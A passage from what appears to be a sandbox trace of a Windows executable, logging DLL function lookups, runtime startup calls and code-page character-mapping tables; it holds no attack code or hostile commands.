lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0293.541] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0293.541] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0293.541] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0293.541] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0293.541] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0293.541] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0293.541] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0293.542] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0293.542] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0293.542] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0293.542] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0293.542] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0293.542] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0293.542] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0293.542] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0293.542] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0293.543] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0293.543] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0293.543] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0293.543] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0293.544] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0293.544] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0293.544] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0293.544] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0293.544] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0293.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5c74e324, dwHighDateTime=0x1d45ac6)) [0293.544] GetCurrentThreadId () returned 0x9e4 [0293.544] GetCurrentProcessId () returned 0xd14 [0293.544] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34100684349) returned 1 [0293.544] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0293.544] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0293.545] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0293.546] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0293.547] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0293.547] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0293.547] GetCurrentThreadId () returned 0x9e4 [0293.547] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xad2f9b64, hStdError=0x475810)) [0293.547] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0293.547] GetFileType (hFile=0x38) returned 0x2 [0293.547] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.547] GetFileType (hFile=0x3c) returned 0x2 [0293.547] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0293.547] GetFileType (hFile=0x40) returned 0x2 [0293.547] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0293.547] GetEnvironmentStringsW () returned 0x5d1e10* [0293.547] FreeEnvironmentStringsW (penv=0x5d1e10) returned 1 [0293.547] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0293.548] GetLastError () returned 0x0 [0293.548] SetLastError (dwErrCode=0x0) [0293.548] GetLastError () returned 0x0 [0293.548] SetLastError (dwErrCode=0x0) [0293.549] GetLastError () returned 0x0 [0293.549] SetLastError (dwErrCode=0x0) [0293.549] GetACP () returned 0x4e4 [0293.549] GetLastError () returned 0x0 [0293.549] SetLastError (dwErrCode=0x0) [0293.549] IsValidCodePage (CodePage=0x4e4) returned 1 [0293.549] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0293.549] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0293.549] GetLastError () returned 0x0 [0293.549] SetLastError (dwErrCode=0x0) [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0293.549] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0293.549] GetLastError () returned 0x0 [0293.549] SetLastError (dwErrCode=0x0) [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0293.549] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0293.549] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0293.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf4\x9a\x2f\xad\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0293.549] GetLastError () returned 0x0 [0293.549] SetLastError (dwErrCode=0x0) [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0293.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0293.549] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0293.549] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0293.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0